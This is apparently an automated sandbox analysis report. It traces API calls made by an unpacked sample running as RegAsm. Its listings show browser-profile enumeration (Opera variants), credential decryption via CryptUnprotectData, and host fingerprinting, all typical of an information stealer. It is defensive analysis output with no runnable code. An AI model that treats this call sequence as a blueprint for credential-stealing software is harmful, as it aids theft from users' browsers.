                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalFree.KERNEL32(?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E01
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                    • String ID: %$% @4$L3B$\*.*
                                                                                                                                                                                                                                                    • API String ID: 2707319931-2476820021
                                                                                                                                                                                                                                                    Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
  • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
  • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
  • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
  • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
  • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
  • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,004268EB,?,?,00000000), ref: 0040AFA2
• StrCmpCA.SHLWAPI(?,00426B28,?,00000000), ref: 0040B01C
• StrCmpCA.SHLWAPI(?,00426B2C,?,00000000), ref: 0040B036
• StrCmpCA.SHLWAPI(00000000,Opera,004268FA,004268F7,004268F6,004268F3,004268F2,004268EF,004268EE,?,00000000), ref: 0040B0CB
• StrCmpCA.SHLWAPI(00000000,Opera GX,?,00000000), ref: 0040B0E3
• StrCmpCA.SHLWAPI(00000000,Opera Crypto,?,00000000), ref: 0040B0FB
Strings
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
• String ID: :$Opera$Opera Crypto$Opera GX$\*.*
• API String ID: 2567437900-1444899082
• Opcode ID: 72390aa4f40f08705d5c468ee64810f5c1ed78beffdb15f489cb743d0a7cff78
• Instruction ID: 1d2c468c39cacdb76342c6c40617b62471d6fbb41a0d231a9737eaa3d7f72c84
• Opcode Fuzzy Hash: 72390aa4f40f08705d5c468ee64810f5c1ed78beffdb15f489cb743d0a7cff78
• Instruction Fuzzy Hash: 16528F30901248EADB15EBA5C955BDDBBB86F19304F5040BEE406736D2DB782B4CCBB6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004167C9
• memset.MSVCRT ref: 004167EE
• GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 004167F7
• lstrcpy.KERNEL32(?,00000000), ref: 00416816
• lstrcpy.KERNEL32(?,00000000), ref: 00416834
• lstrcpy.KERNEL32(?,00000000), ref: 00416857
• lstrlenA.KERNEL32(00000000), ref: 004168BE
Strings
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
• String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
• API String ID: 1884655365-147700698
• Opcode ID: 3b74bf27872f1abc26cc06abfc262733de611be0a900d8180cdc3aef528747f9
• Instruction ID: 49d03d9c4bad79a8dd4c39d4ea67452dd68ffa38f43acce7c1d049db5cde4bef
• Opcode Fuzzy Hash: 3b74bf27872f1abc26cc06abfc262733de611be0a900d8180cdc3aef528747f9
• Instruction Fuzzy Hash: BB618F71500348ABDB20EF61CC46FEE7B69AF05704F50412AB909672C2DF78BA48CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
  • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
  • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
  • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
  • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
  • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
  • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
• FindFirstFileA.KERNEL32(00000000,004268DF,00000000,?,00426AE0,?,?,004268DF,?,00000004), ref: 0040A4A1
• StrCmpCA.SHLWAPI(?,00426AE4), ref: 0040A4DD
• StrCmpCA.SHLWAPI(?,00426AE8), ref: 0040A4F7
• StrCmpCA.SHLWAPI(?,015D1EF8,00000000,?,?,?,00426AEC,?,?,004268E2), ref: 0040A58C
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
• String ID:
• API String ID: 2567437900-0
• Opcode ID: feebf728ddc35abdd0333e99622beafaf52dfbac5eb61752111df047f5aa0221
• Instruction ID: 0c354dfb940c8eaad85f7de44e4c6f6ad6069b37fd6802769f14803bf13ff224
• Opcode Fuzzy Hash: feebf728ddc35abdd0333e99622beafaf52dfbac5eb61752111df047f5aa0221
• Instruction Fuzzy Hash: FBD17E70901348EACB10EBB5C9466DE7FB9AF19704F10817EE805736C2DB785B48CAE6
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
• GetKeyboardLayoutList.USER32(00000000,00000000,00426EBF,?,?,00000001), ref: 00410267
• LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410279
• GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410284
• GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102B6
  • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
  • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
  • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
  • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
• LocalFree.KERNEL32(?,?,?,00000001), ref: 0041035A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                    • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410065
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041006C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,015CB448,00000000,00020119,?), ref: 0041008B
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004100A5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                    • API String ID: 3676486918-1022791448
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101C1
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004101C8
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 004101D7
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410202
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                    • String ID: wwww
                                                                                                                                                                                                                                                    • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041099F
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 004109AF
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004109C1
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00410A2E
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410A39
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 562399079-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411AC9
                                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00411AD9
                                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00411AEB
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,?), ref: 00411B00
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00411B22
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102B6
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041035A
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$FreeInfoLocalLocalelstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: /
                                                                                                                                                                                                                                                    • API String ID: 3280604673-4001269591
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406ED5
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406EED
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00406F0E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2068576380-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004180F2,004271B6), ref: 004100DC
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,004180F2,004271B6), ref: 004100E3
                                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,004271B6), ref: 004100F7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1206570057-0
                                                                                                                                                                                                                                                    • Opcode ID: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                    • Instruction ID: 19b93291ffa213a11ad41bdc802fd7864df3898d1af9124162a70396b117772a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 473499ec4a489346d5b8381035135aa7156d3b2d8f7926a473b752b9a765c721
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88D012B9551228BBE7009BD49D0DFDA7B6DDB06751F001192FB05D3240D5F0590047E1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2452939696-0
                                                                                                                                                                                                                                                    • Opcode ID: ef5c536bf4511d1fc8555fe4fa8161474e40b389619cca3d7e11b8caff3747a8
                                                                                                                                                                                                                                                    • Instruction ID: de5202d25358e933d58d178cf98dd0e4fc68860c0803fe1746855763c5f285eb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef5c536bf4511d1fc8555fe4fa8161474e40b389619cca3d7e11b8caff3747a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAD012B990011CDBC710DB90EC85AAAB77DAB48600F404695EF15E2140E6756A1D8AE5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 004189C0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015D1258), ref: 00418B6C
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(752C0000,015C2780), ref: 00418B84
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C4098), ref: 00418BA4
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C41D8), ref: 00418BBC
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015D13F0), ref: 00418BD5
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C2600), ref: 00418BED
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C2860), ref: 00418C05
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(74EC0000,015C3D50), ref: 00418C1E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1330), ref: 00418C3E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015C2920), ref: 00418C56
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015CF8B0), ref: 00418C6F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1348), ref: 00418C87
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1360), ref: 00418C9F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015C28E0), ref: 00418CB8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015C2660), ref: 00418CD0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1408), ref: 00418CE8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75BD0000,015D1480), ref: 00418D01
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015C2960), ref: 00418D1D
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D1498), ref: 00418D35
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D14C8), ref: 00418D4E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D14B0), ref: 00418D66
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75A70000,015D11E0), ref: 00418D7E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75450000,015C2820), ref: 00418D9A
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75450000,015C25C0), ref: 00418DB2
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75DA0000,015C2700), ref: 00418DCE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(75DA0000,015D11F8), ref: 00418DE6
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C27E0), ref: 00418E06
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C2900), ref: 00418E1E
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C2620), ref: 00418E37
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015D14F8), ref: 00418E4F
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C2880), ref: 00418E67
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C25E0), ref: 00418E80
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015C26A0), ref: 00418E98
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,015D16C8), ref: 00418EB0
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00418EC7
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 00418EDE
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(6CA80000,SymMatchString), ref: 00418FDE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                    • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                                    • Opcode ID: 953c69991870206c77da6e2faa755a67d13f47f573c48f6a2580bfbba979c913
